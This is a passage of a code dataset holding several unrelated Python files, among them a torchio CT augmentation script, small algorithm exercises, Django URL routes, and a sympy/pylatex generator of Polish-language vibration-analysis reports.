tio.Compose([\n\t\ttio.RandomFlip(axes=(0,1,2), flip_probability=0.5),\n\t\ttio.CropOrPad(params['patch_size'], padding_mode=0, p=0.5),\n\t\ttio.RandomAffine(p=0.5),\n\t\ttio.ZNormalization(masking_method='label',p=0.5),\n\t\ttio.OneOf({\n\t\t\ttio.RandomBlur(): 0.1,\n\t\t\ttio.RandomBiasField(0.25, order=4): 0.1,\n\t\t\ttio.RandomNoise(0, 0.02): 0.1,\n\t\t\ttio.RandomGamma((-0.1,0.1)): 0.1,\n\t\t}),\n\t\ttio.OneOf({\n\t\t\ttio.RescaleIntensity(percentiles=(0,99)): 0.1,\n\t\t\ttio.RescaleIntensity(percentiles=(1,100)): 0.1,\n\t\t\ttio.RescaleIntensity(percentiles=(0.5,99.5)): 0.1,\n\t\t})\n\t])\n\t#TODO find a way to precalculate this for tiling\n\t# if config['n_blocks'] == 2: label_size = (48,48,48)\n\t# if config['n_blocks'] == 3: label_size = (24,24,24)\n\tlabel_size = params['roiSize']\n\n\ttrain_subjects = precacheSubjects(params['dataset_path'], params['train_data'], params['bone'], params['roiSize'], dataset_name=params['dataset_name'])\n\ttrain_ds = 
tio.SubjectsDataset(train_subjects, transform=transforms) \n\tpatch_sampler = tio.LabelSampler(params['patch_size'], 'label', params['sampler_probs'])\n\tpatches_queue = tio.Queue(\n\t\ttrain_ds,\n\t\tmax_length=8000,\n\t\tsamples_per_volume=1,\n\t\tsampler=patch_sampler,\n\t\tnum_workers=params['num_workers'],\n\t)\n\ttrain_loader = torch.utils.data.DataLoader(patches_queue, batch_size=params['batch_size'], shuffle=False, num_workers=0, pin_memory=torch.cuda.is_available())\n\n\ti = train_data[0]\n\tscan = ctreader.read(i)\n\tlabel = ctreader.read_label(bone, i, name=\"JAW_20230124\")\n\tcenter = ctreader.jaw_centers[i]\n\tx = ctreader.crop3d(scan, params['roiSize'], center=center)\n\tx = np.array((x/x.max())*255, dtype=\"uint8\")\n\ty = ctreader.crop3d(label, params['roiSize'], center=center)\n\tprint(x.shape, x.min(), x.max(), x.dtype)\n\tprint(y.shape, y.min(), y.max(), y.dtype)\n\n\t# import pdb; pdb.set_trace()\n\tproj = ctreader.plot_side_by_side(x, y)\n\tprint(proj.shape, proj.min(), proj.max(), proj.dtype)\n\tplt.imsave(f\"output/figs/jaw/data_aug/data_aug_raw.png\", proj)\n\n\t# import pdb;pdb.set_trace()\n\tsaved = 0\n\ttarget = 10\n\tfor e in range(target):\n\t\tfor batch in train_loader:\n\t\t\tprint(batch.keys())\n\t\t\txs,ys = batch['ct'][tio.DATA].cpu(), batch['label'][tio.DATA].cpu()\n\n\t\t\tfor x,y in zip(xs, ys):\n\t\t\t\tprint(x.shape, y.shape)\n\n\t\t\t\tx = np.squeeze(np.array(x))*255\n\t\t\t\ty = undo_one_hot(np.array(y), n_classes=5)\n\n\t\t\t\tprint(x.max(), x.min())\n\n\t\t\t\tproj = ctreader.plot_side_by_side(x, y)\n\t\t\t\tproj = proj/proj.max()\n\t\t\t\tplt.imsave(f\"output/figs/jaw/data_aug/data_aug_{saved}.png\", proj)\n\t\t\t\tsaved+=1\n\t\t\t\tif saved >= target: exit()\n\t\t\t\t# break\n\t\t\t\t# ctreader.view(x, label=y)\n\n\n\n\n\n","repo_name":"wahabk/ctfishpy","sub_path":"scripts/jaw/training/test_datagenie.py","file_name":"test_datagenie.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804164249","text":"def trailingZeroes(n: int) -> int:\n res = 0\n for i in range(5, n + 1, 5):\n while i % 5 == 0:\n res += 1\n i //= 5\n\n return res\n\n\nif __name__ == '__main__':\n print(trailingZeroes(30))\n","repo_name":"DengBoCong/Algorithm","sub_path":"core/FactorialTrailingZeroes/FactorialTrailingZeroes.py","file_name":"FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"20291475068","text":"import os \nprint(os.name)\n\nimport os\nprint(os.getcwd())\n# To print absolute path on your system\nprint(os.path.abspath('.'))\n\n# To print files and directories in the current directory\n# on your system\nprint(os.listdir('.'))\n\nfd = \"GFG.txt\"\nfile = open(fd, 'w')\ntext = file.write(\" \")\nprint(text)\nfile.close()\n\nfd = \"stud.txt\"\nfile = open(fd, 'r')\ntext = file.read()\nprint(text)\nfile.close()\n\n\n# file rename\nfd = \"GFG.txt\"\n# os.rename(fd,'New.txt')\nos.uname()\nprint(os.uname())\n\n\n","repo_name":"davesarath/python-programs","sub_path":"os and file projects/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17635465818","text":"'''\nDescription: \nversion: \nAuthor: Data Designer\nDate: 2020-11-01 22:30:24\nLastEditors: Data Designer\nLastEditTime: 2021-05-12 19:04:47\n'''\n#\n# 
@lc app=leetcode.cn id=29 lang=python3\n#\n# [29] Divide Two Integers\n#\n\n# @lc code=start\nclass Solution:\n def divide(self, dividend: int, divisor: int) -> int:\n result = 0\n flag = 0 # sign\n # determine the sign first\n if abs(dividend) + abs(divisor) == abs(dividend+divisor):\n flag = 1\n else:\n flag = -1\n # |dividend| is smaller than |divisor|\n if abs(dividend)<abs(divisor):\n return 0\n # while s>0:\n #     ans+=1\n #     s -=abs(divisor)\n # return ans*flag\n else:\n # ans = 1 cannot be passed into the closure\n dividend = abs(dividend)\n divisor = abs(divisor)\n def div(dividend,divisor):\n if dividend < divisor: # this base case is required\n return 0\n ans = 1\n cur = divisor\n while cur+cur< dividend:\n cur = cur + cur # double: 1x, 2x, 4x, ...\n ans +=ans\n return ans + div(dividend-cur,divisor) # cur covers a multiple of divisor (how many times is recorded in ans); recurse to find what multiple of divisor the remainder is\n result = div(dividend,divisor)\n if flag<0:\n result = 0-result\n if result>2**31-1:\n return 2**31-1\n elif result<-2**31:\n return -2**31\n else:\n return result\n\n# @lc code=end\n\n","repo_name":"Data-Designer/Leetcode-Travel","sub_path":"leetcode/29.两数相除.py","file_name":"29.两数相除.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41817578508","text":"from hashlib import md5\n\nif __name__ == \"__main__\":\n key = \"ckczppom\"\n zeros = 6\n\n i = 0\n while True:\n attempt = \"\".join([key, str(i)]).encode('utf-8')\n if md5(attempt).hexdigest()[0:zeros] == \"0\" * zeros:\n print(i)\n break\n i += 1","repo_name":"tcdejong/advent-of-code","sub_path":"2015/day04/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8591863278","text":"import time\r\n\r\ndef FindDivisors(number):\r\n userInput = number\r\n exactDivisors = list()\r\n for divisors in range(1, userInput + 1):\r\n if userInput % divisors == 0:\r\n exactDivisors.append(divisors)\r\n print(\"Exact divisors of {} = {}\".format(userInput, exactDivisors))\r\n\r\nwhile True:\r\n userChoice = input(\"Give me a number or For quit : 'Q'\")\r\n if userChoice.lower() == \"q\":\r\n break\r\n else:\r\n FindDivisors(int(userChoice))\r\n\r\n#or\r\n\r\ndef TamBolenleriBulma(sayi):\r\n tamBolenler = list()\r\n for sayilar in range(1, sayi):\r\n if sayi % sayilar == 0:\r\n tamBolenler.append(sayilar)\r\n return tamBolenler\r\n\r\nwhile True:\r\n kullaniciSecimi = input(\"Çıkmak için Q: \")\r\n if kullaniciSecimi.lower() == \"q\":\r\n break\r\n else:\r\n print(kullaniciSecimi, \"sayisinin tam bolenleri\", TamBolenleriBulma(int(kullaniciSecimi)))","repo_name":"Nihilnia/reset","sub_path":"Day 15 - Exact divisors of a Number Questioning.py","file_name":"Day 15 - Exact divisors of a Number Questioning.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41721720531","text":"\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.views.generic.base import RedirectView\nfrom django.urls import path\nfrom project import views\nfrom django.contrib import admin\n\napp_name = 'project'\n\nurlpatterns = [\n path('favicon.ico', RedirectView.as_view(url=staticfiles_storage.url('img/favicon.ico'))),\n path('admin/', admin.site.urls),\n path('', views.home, name='home'),\n path('accounts/login/', views.login, name='login'),\n path('accounts/register/', views.register, name='register'),\n path('accounts/login/home/', views.user_home, name='userhome'),\n path('news/', views.news, name='news'),\n path('news/', views.userNews, 
name='usernews'),\n path('myBracket/', views.myBracket, name='bracket'),\n path('createBracket/', views.createBracket, name='createBracket'),\n path('editBracket//', views.editBracket, name='edit'),\n path('scores/', views.scores, name='scores'),\n path('scores/', views.userScores, name='userscores'),\n path('teams/', views.teams, name='teams'),\n path('createTeam/', views.createTeam, name='createTeam'),\n path('joinTeam/', views.joinTeam, name='joinTeam'),\n path('userTeams/', views.userTeams, name='userteams'),\n path('leaveTeam/', views.leaveTeam, name='leaveTeam'),\n path('prediction/', views.prediction, name='prediction'),\n]\n","repo_name":"srh95/CSDS-395-Senior-Project","sub_path":"method/method/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15921231127","text":"from sympy import *\nimport sympy as sym\nimport itertools as itools\nfrom pylatex import (Document, Package, Command\n #Section, Subsection, Subsubsection, Itemize, HorizontalSpace, Description, Marker\n )\nfrom pylatex.base_classes.containers import Container\n#from pylatex.section import Paragraph, Chapter\nfrom pylatex.utils import (#italic, \n NoEscape)\n\nfrom ..adaptable import *\nfrom ..report import *\n\n\nclass MultivariableTaylorSeries(Expr):\n \n def __new__(cls,expr, variables,*args, n=2, x0=None):\n \n obj=super().__new__(cls,expr,variables,*args)\n obj._vars = variables\n obj._order = n\n obj._op_point = x0\n \n obj._expr_symbol = None\n \n return obj\n\n def _set_default_op_point(self):\n '''\n It sets 0 as op_point if x0 (look __new__) is not provided. For lack of op_point, the result is the same as MacLaurina series \n '''\n \n if self._op_point is None:\n self._op_point = {coord:0 for coord in self._vars}\n \n return self._op_point\n \n def _args_shifted(self,*args):\n \n self._set_default_op_point()\n \n args_shifted = {\n arg: arg - arg_shift\n for arg, arg_shift in self._op_point.items()\n }\n \n return args_shifted\n\n def _diff_orders_dict(self):\n \n order_max = self._order\n args = self._vars\n args_shifted = self._args_shifted()\n \n \n diff_orders_list = sum([\n list(itools.combinations_with_replacement(args, order))\n for order in range(1, order_max + 1, 1)\n ], [])\n \n \n diff_orders_dict = {\n comp: (sym.Mul(*comp).subs(args_shifted) / sym.Mul(*[\n sym.factorial(elem) for elem in sym.Poly(sym.Mul(*comp), *args).terms()[0][0]\n ])).doit()\n for comp in diff_orders_list\n }\n\n return diff_orders_dict\n\n \n def _diff_symbols_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n expr=self.args[0]\n op_point=self._op_point\n \n \n \n return {S.Zero:Subs(expr,list(op_point.keys()),list(op_point.values())),**{args_tmp:Subs(Derivative(expr,*args_tmp,evaluate=False),list(op_point.keys()),list(op_point.values())) \n for args_tmp, poly in diff_orders_dict.items()}}\n\n def _diff_expr_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n expr=self.args[0]\n op_point=self._op_point\n \n return {S.Zero:expr.subs(op_point),**{args_tmp:expr.diff(*args_tmp).subs(op_point)\n for args_tmp, poly in diff_orders_dict.items()}}\n \n def _components_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n derivatives_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return {\n Subs(expr,list(op_point.keys()),list(op_point.values())):expr.subs(op_point),\n **{derivatives_dict[args_tmp] : expr.diff(*args_tmp).subs(op_point) for 
args_tmp, poly in diff_orders_dict.items()}\n }\n \n def _series(self):\n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return expr.subs(op_point).doit()+Add(*[expr.diff(*args_tmp).subs(op_point).doit() * poly for args_tmp, poly in diff_orders_dict.items()],evaluate=False)\n \n def _symbolic_sum(self):\n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return Subs(expr,list(op_point.keys()),list(op_point.values()))+Add(*[Mul(diff_dict[args_tmp] ,poly,evaluate=True) for args_tmp, poly in diff_orders_dict.items()],evaluate=False)\n \n def _latex(self,*args):\n \n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return '+'.join([latex(Mul(diff_dict[args_tmp] ,poly,evaluate=True)) for args_tmp, poly in diff_orders_dict.items()])\n\n \n def calculation_steps(self,expr_symbol=None,form=None):\n\n obj = self\n \n if expr_symbol is None:\n obj._expr_symbol = self.args[0]\n \n obj_sym = self.__class__(expr_symbol,self._vars, n=self._order, x0=self._op_point)\n \n expr_dict=(self._diff_expr_dict())\n diffs_dict=(obj_sym._diff_symbols_dict())\n \n\n \n \n return [Eq(diffs_dict[key],expr_dict[key].doit()) for key in diffs_dict.keys()]\n \n def __str__(self,*args):\n return (self.args[0]).__str__()\n \n def __repr__(self,*args):\n return (self.args[0]).__repr__()\n\n \n \n \n def doit(self,*args):\n return self._series()\n\n\nclass ReportComponent(Subsection):\n\n latex_name = 'subsection'\n packages=[\n Package('standalone'),\n Package('siunitx')\n ]\n \n title='Report generic component'\n\n def __init__(self, system,title=None, numbering=False, *, label=True, **kwargs):\n \"\"\"\n Args\n ----\n title: str\n The section title.\n numbering: bool\n Add a number before the section title.\n label: Label or bool or str\n Can set a label manually or use a boolean to set\n preference between automatic or no label\n \"\"\"\n\n self._system=system\n \n if title is None:\n title = self.title\n \n super().__init__(title=title, numbering=numbering, label=label, **kwargs)\n\n\n \n\n ReportText.set_container(self)\n #ReportText.set_directory('./SDAresults')\n SympyFormula.set_container(self)\n LatexDataFrame.set_default_container(self)\n Markdown.set_container(self)\n LatexDataFrame.set_picture_mode(True)\n Picture.set_container(self)\n #LatexDataFrame.set_directory('./SDAresults')\n \n \n self.append_elements()\n \n def append_elements(self):\n pass\n\n def as_frame(self):\n frame=Frame(title=self.title,options=['allowframebreaks'])\n #frame.packages +(self.packages)\n frame+=(list(self))\n return frame\n\n\n\nclass TitlePageComponent(Environment):\n \n latex_name='titlepage'\n \n def __init__(self, system=None, options=None, arguments=None, start_arguments=None,\n **kwargs):\n r\"\"\"\n Args\n ----\n options: str or list or `~.Options`\n Options to be added to the ``\\begin`` command\n arguments: str or list or `~.Arguments`\n Arguments to be added to the ``\\begin`` command\n start_arguments: str or list or `~.Arguments`\n Arguments to be added before the options\n \"\"\"\n\n self.system = system\n self.options = options\n self.arguments = arguments\n self.start_arguments = start_arguments\n\n \n \n super().__init__(options=options, arguments=arguments, start_arguments=start_arguments,**kwargs)\n \n if self.system is not None:\n\n \n system = 
self.system\n\n\n \n self.append(NoEscape('\\centering'))\n\n self.append(NoEscape('\\\\Huge DRGANIA MECHANICZNE \\n \\n'))\n \n self.append(Command('vspace',arguments='1cm'))\n\n \n \n if len(system.q)==1:\n dof_str = 'JEDNYM STOPNIU SWOBODY'\n else:\n dof_str = 'WIELU STOPNIACH SWOBODY'\n \n if system._dissipative_potential==0 or system._dissipative_potential is None:\n damping_str = 'NIETŁUMIONE'\n else:\n damping_str = 'TŁUMIONE'\n\n \n self.append(NoEscape(f'\\\\Large {damping_str} UKŁADY O {dof_str} \\n \\n')) \n \n self.append(Command('vspace',arguments='1cm'))\n \n self.append(NoEscape(f'{system._label} \\n \\n'))\n \n self.append(Command('vspace',arguments='1cm'))\n \n self.append(Command('MyAuthor'))\n self.append(NoEscape(f'\\\\par'))\n self.append(Command('vspace',arguments='1cm'))\n \n #self.append(Command('vspace',arguments='1cm'))\n #self.append(NoEscape(f'\\\\protect\\\\par'))\n #self.append(NewLine())\n self.append(Command('MyDate'))\n\n \n\n\n \nclass ExemplaryPictureComponent(ReportComponent):\n \n title=\"Przykład rzeczywistego obiektu\"\n packages=[Package('float')] \n \n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Ilustracja przedstawia rzeczywisty obiekt mechaniczny, będący przedmiotem modelowania i analizy dynamicznej.\n '''))\n\n with self.create(Figure(position='H')) as fig:\n fig.add_image(system._real_example(),width='8cm')\n\n display(ReportText(f'''Model dynamiczny układu określa się na podstawie analizy rozważanego przypadku. \n Należy pamiętać, że stopień odwzorowania (poziom abstrakcji) modelu zależy od tego do czego planuje się go używać.\n ''')) \n\n \nclass SchemeComponent(ExemplaryPictureComponent):\n title=\"Schemat układu\"\n\n\n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Ilustracja przedstawia schemat rzeczywistego obiektu mechanicznego, wyznaczony na podstawie uprzedniej analizy rzeczywistego obiektu.\n '''))\n \n with self.create(Figure(position='H')) as fig:\n fig.add_image(system._scheme(),width='8cm')\n\n display(ReportText(f'''Analizując przedstawiony układ można stwierdzić, że jego liczba stopni swobody to {len(system.q)}.\n '''))\n\n\n\nclass NumericalAnalysisComponent(ExemplaryPictureComponent):\n title=\"Symulacja numeryczna\"\n\n _default_ics = None\n _default_parameters = {}\n _default_tspan = np.linspace(0,1,1000)\n \n @classmethod\n def set_default_ics(cls,default_ics=None):\n \n if default_ics is None:\n cls._default_ics = default_ics\n \n return cls\n\n @classmethod\n def set_default_parameters(cls,default_parameters=None):\n \n if default_parameters is None:\n cls._default_parameters = default_parameters\n \n return cls\n \n @classmethod\n def set_default_tspan(cls,default_tspan=None):\n \n if default_tspan is None:\n cls._default_tspan = default_tspan\n \n return cls\n \n\n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Dla Damiana :P\n '''))\n if self._default_ics is None:\n ics = list(system.Y*0.0)\n else:\n ics = self._default_ics\n \n sym_res = system.subs(self._default_parameters).numerized().compute_solution(self._default_tspan,ics)\n\n LatexDataFrame.formatted(sym_res).plotted(preview=True)\n \n\n display(ReportText(f'''Dla Damiana :P\n '''))\n\nclass KineticEnergyComponent(ReportComponent):\n \n title=\"Energia kinetyczna\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n \n\n\n display(ReportText(f'''\n Energia kinetyczna układu wyrażona jest wzorem:\n \n '''))\n 
\n\n display(SympyFormula( Eq(Symbol('T'),\n dyn_sys_lin._kinetic_energy) , marker=None))\n \n display(ReportText(f'''\n Wyznaczona wielkość określa energię układu wynikającą z jego własności inercyjnych (energię zmagazynowaną w elementach bezwładnych).\n \n '''))\n \n \n \nclass PotentialEnergyComponent(ReportComponent):\n \n title=\"Energia potencjalna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Energia potencjalna układu wyrażona jest wzorem:\n '''))\n\n display(SympyFormula( Eq(Symbol('V'),\n dyn_sys_lin._potential_energy ), marker=None))\n\n display(ReportText(f'''\n Zaprezentowana zależność opisuje oddziaływanie potencjalnych pól sił w których znajduje się obiekt.\n ''')) \n \nclass DissipationComponent(ReportComponent): # Marcel\n \n title=\"Dyssypacyjna funkcja Rayleigh'a\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n \n\n display(ReportText(f'''\n Energia rozpraszana tłumieniem wyrażona jest wzorem:\n \n '''))\n\n display(SympyFormula( Eq(Symbol('D'),\n dyn_sys_lin._dissipative_potential) , marker=None ))\n\n display(ReportText(f'''\n Podana zależność stanowi potencjał dysynpacyjny Rayleigh'a, \n który poddany różniczkowaniu względem wektora prędkości uogólnionych pozwala na określenie sił wiskotycznego tłumienia.\n '''))\n \nclass SpringForce(ReportComponent):\n \n title=\"Siła od sprężyny\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Siła od sprężyny wyrażona jest wzorem:\n '''))\n display(SympyFormula( Eq(Symbol('F'),-1*system._left_mount.stiffness*system.z,evaluate=False)))\n \n display(ReportText(f'''\n zamiast x używam steady solution\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system._left_mount.stiffness*system.steady_solution(),evaluate=False)))\n\n\n display(ReportText(f'''\n Siła od sprężyny, zwana również siłą naciągu, pojawia sie przy ściskaniu lub rozciaganiu. Siła, która działa jest przeciwnie skierowana do ruch i chce przywrócić do pierwotnego jej położenia. Zależy od sztywności sprężyny k oraz od tego o ile została rozciagnieta bądź skrócona x.\n '''))\n \nclass DamperForce(ReportComponent):\n \n title=\"Siła tłumienia\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Siła tłumienia wyrażona jest wzorem:\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system.c*system.v,evaluate=False)))\n\n display(ReportText(f'''\n zastępuje prędkość jako pochodna steady stolution po czasie:\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system.c*system.steady_solution().diff(system.ivar),evaluate=False)))\n\n display(ReportText(f'''\n Siła tłumienia zmniejsza amplitude drgań, ma zwrot przeciwny do prędkości. Zależy od współczynnika tłumienia b oraz od prędkości v.\n ''')) \nclass LogarithmicDecrement(ReportComponent):\n \n title=\"logarytmiczny dekrement tłumienia liczony z amplitud\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Logarytmiczny dekrement tłumienia wyrażona jest wzorem przy pomocy amplitud:\n '''))\n\n display(SympyFormula( Eq(Symbol('delta'),log(system.A_n1/system.A_n2))))\n\n\n display(ReportText(f'''\n Zaprezentowana zależność opisuje bezwymaiarową wielkość charakteryzującą intensywność tłumienia drgań swobodnych w przypadku podkrytycznym. 
Jest to wielkość stała dla rozpaywanego układu drgającego i nie zależy od warrunków początkowych. Zależy natomiast od maksymalnych wychyleń w chwilach różniących się o okres drań tłumionych.\n '''))\n display(ReportText(f'''\n Logarytmiczny dekrement tłumienia u wyrażona jest wzorem przy pomocy okresu drgań tłumionych:\n '''))\n display(SympyFormula( Eq(Symbol('delta'),2*pi*system.damping_coefficient()*(system.natural_frequencies())**-1,evaluate=False)))\n \n display(ReportText(f'''\n Zaprezentowana zależność opisuje bezwymaiarową wielkość charakteryzującą intensywność tłumienia drgań swobodnych w przypadku podkrytycznym. Jest to wielkość stała dla rozpaywanego układu drgającego i nie zależy od warrunków początkowych.Zależy natomiast od okresu drań tłumionych i współczynnika h.\n '''))\n\n\nclass LagrangianComponent(ReportComponent):\n \n title=\"Lagrangian (funkcja Lagrange'a) układu\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys.linearized()\n\n \n print(system._scheme())\n \n mrk_lagrangian_nonlin=Marker('lagrangianNL',prefix='eq')\n\n #display(ReportText(f'''The following model is considered. The system's Lagrangian is described by the formula ({Ref(mrk_lagrangian_nonlin).dumps()}):\n # '''))\n display(ReportText(f'''Lagrangian systemu wyrażony jest wzorem ({AutoMarker(Eq(Symbol('L'),dyn_sys.L.expand()[0]))}):\n '''))\n\n display((SympyFormula( Eq(Symbol('L'),dyn_sys.L.expand()[0]) , marker=mrk_lagrangian_nonlin ) ))\n \n q_sym =[ Symbol(f'{coord}'[0:-3]) for coord in dyn_sys.q]\n \n diffL_d=lambda coord: Symbol(f'\\\\frac{{ \\\\partial L}}{{ \\\\partial {vlatex(coord)} }}')\n diffD_d=lambda coord: Symbol(f'\\\\frac{{ \\\\partial D}}{{ \\\\partial {vlatex(diff(coord))} }}')\n d_dt_diffL_d=lambda coord: Symbol(f'\\\\frac{{ \\\\mathrm{{d}} }}{{ \\\\mathrm{{d}} {vlatex(system.ivar)} }} {vlatex(diffL_d(coord))} ') \n\n display(ReportText(f'''Równania Eulera-Lagrange'a dla rozważanego przypadku są nastęujące: \n '''))\n \n for coord in dyn_sys.q:\n display((SympyFormula( Eq(d_dt_diffL_d(coord.diff(system.ivar)) - diffL_d(coord) + diffD_d(coord),Symbol(f'Q_{{ {vlatex(coord)} }}^N')) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n \n \n display(ReportText(f'''Kolejne pochodne wynikające z zastosowania równań Eulera-Lagrange'a są nastęujące: \n '''))\n \n for coord in dyn_sys.Y:\n display((SympyFormula( Eq(diffL_d(coord),dyn_sys.L.expand()[0].diff(coord)) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n \n\n\n for coord in dyn_sys.q.diff(system.ivar):\n display((SympyFormula( Eq(d_dt_diffL_d(coord),dyn_sys.L.expand()[0].diff(coord).diff(system.ivar)) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n for coord in dyn_sys.q:\n display((SympyFormula( Eq(diffD_d(coord),(S.One/2 * diff(dyn_sys.q.transpose())* dyn_sys_lin.damping_matrix()* diff(dyn_sys.q))[0].diff(diff(coord))) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n #display(Markdown(f'\\\\begin{equation} \\\\end{equation}').reported())\n #with doc_model.create(DMath()) as eq:\n # eq.append(NoEscape(latex(Derivative(Symbol('L'),q_sym[0],evaluate=False))))\n # eq.append(NoEscape('='))\n # eq.append(NoEscape(vlatex(dyn_sys.L.expand()[0].diff(dyn_sys.q[0]))))\n\n mrk_gov_eq_nonlin=Marker('gov_eq_nonlin_sys',prefix='eq')\n\n #display(ReportText(f'''The governing equations of the system have a following form ({Ref(mrk_gov_eq_nonlin).dumps()}):\n # '''))\n\n display(ReportText(f'''Wyniki przedstawionych operacji wykorzystuje się wyznaczenia równań ruchu układu.\n '''))\n\n\n \n 
def as_frame(self):\n frame=Frame(title=self.title,options=['allowframebreaks'])\n #frame.packages +(self.packages)\n frame+=(list(self))\n return frame\n \n \nclass GoverningEquationComponent(ReportComponent):\n \n title=\"Równania ruchu\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys.linearized()\n\n \n\n \n if len(system.q)==1:\n markers_str=f\"przedstawia zależność ({AutoMarker(Eq(dyn_sys._eoms[0].simplify().expand(),0))})\" \n else:\n markers_str=f\"przedstawiają zależności ({AutoMarker(Eq(dyn_sys._eoms[0].simplify().expand(),0))})-({AutoMarker(Eq(dyn_sys._eoms[-1].simplify().expand(),0))})\"\n\n display(ReportText(f'''\n Wykorzystując obliczone pochodne, wyznacza się równania ruchu na podstawie odpowiedniego wzoru.\n Równania ruchu układu (nieliniowe w ogólnym przypadku) {markers_str}:\n '''))\n \n for eq in dyn_sys._eoms:\n display(SympyFormula( Eq(eq.simplify().expand(),0) , marker=None))\n\n display(ReportText(f'''\n Wyznaczone równania stanowią matematyczny opis dynamiczny właściwości układu.\n Dalsza analiza pozwala na skuteczną analizę działania modelowanego obiektu i określenie jego parametrów mechanicznych.\n '''))\n\n\nclass LinearizationComponent(ReportComponent):\n \n title=\"Linearyzacja równań ruchu\"\n \n def append_elements(self):\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n coords=tuple(list(dyn_sys.Y) + list(dyn_sys.q.diff(t,t)))\n op_point = {coord: 0 for coord in coords}\n\n #display(self._op_points(hint=hint, subs=True))\n op_point.update(dyn_sys._op_points(subs=True)[0])\n\n\n mrk_lagrangian_nonlin = Marker('lagrangLin',prefix='eq')\n mrk_lagrangian_lin = Marker('lagrangLin',prefix='eq')\n\n display(ReportText(\n f'''Linearyzaja równań polega na znalezieniu ich rozwinięcia w szereg Taylora względem współrzędnych, prędkości i przyspieszeń uogólnionych w otoczeniu punktu równowagi.\n Celem uproszczenia wprowadzono następujące oznaczenia:'''))\n\n for coord in coords:\n display((SympyFormula( Eq(Symbol(vlatex(coord)),Symbol(latex(coord))) , marker=mrk_lagrangian_lin ) )) \n\n\n\n display(ReportText(\n f'''Punkty równowagi rozważanego układu są następujące:\n ''')) \n\n for eq_coord,val in op_point.items():\n display((SympyFormula( Eq(eq_coord,val) , marker=mrk_lagrangian_lin ) ))\n\n\n diffL_d=lambda coord: Symbol(latex(Derivative(Symbol('L'),Symbol(vlatex(coord)))) )\n\n\n\n for no,eom in enumerate(dyn_sys._eoms):\n\n\n\n\n eq_sym=Symbol(f'RR_{latex(dyn_sys.q[no])}')\n\n\n display(ReportText(f'''Równanie ruchu dla współrzędnej ${latex(dyn_sys.q[no])}$ można przestawić jako:\n '''))\n\n display((SympyFormula( Eq(eq_sym,eom,evaluate=False) , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n\n display(ReportText(\n f'''Formalnie należy obliczyć pochodne cząstkowe wielkości uogólnionych ze składników równań Lagrange'a:\n '''))\n\n\n display((SympyFormula( Eq(MultivariableTaylorSeries(eq_sym,coords,n=1,x0=op_point)._symbolic_sum(),0) , marker=None,backend=latex ) ))\n\n diff_list=MultivariableTaylorSeries(eom,coords,n=1,x0=op_point).calculation_steps(expr_symbol=eq_sym)\n\n display(ReportText(\n f'''Poszczególne pochodne mają następującą postać:\n '''))\n\n for diff_eq in diff_list:\n\n display((SympyFormula( diff_eq , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n display(ReportText(f'''Po podstawieniu obliczonych pochodnych, 
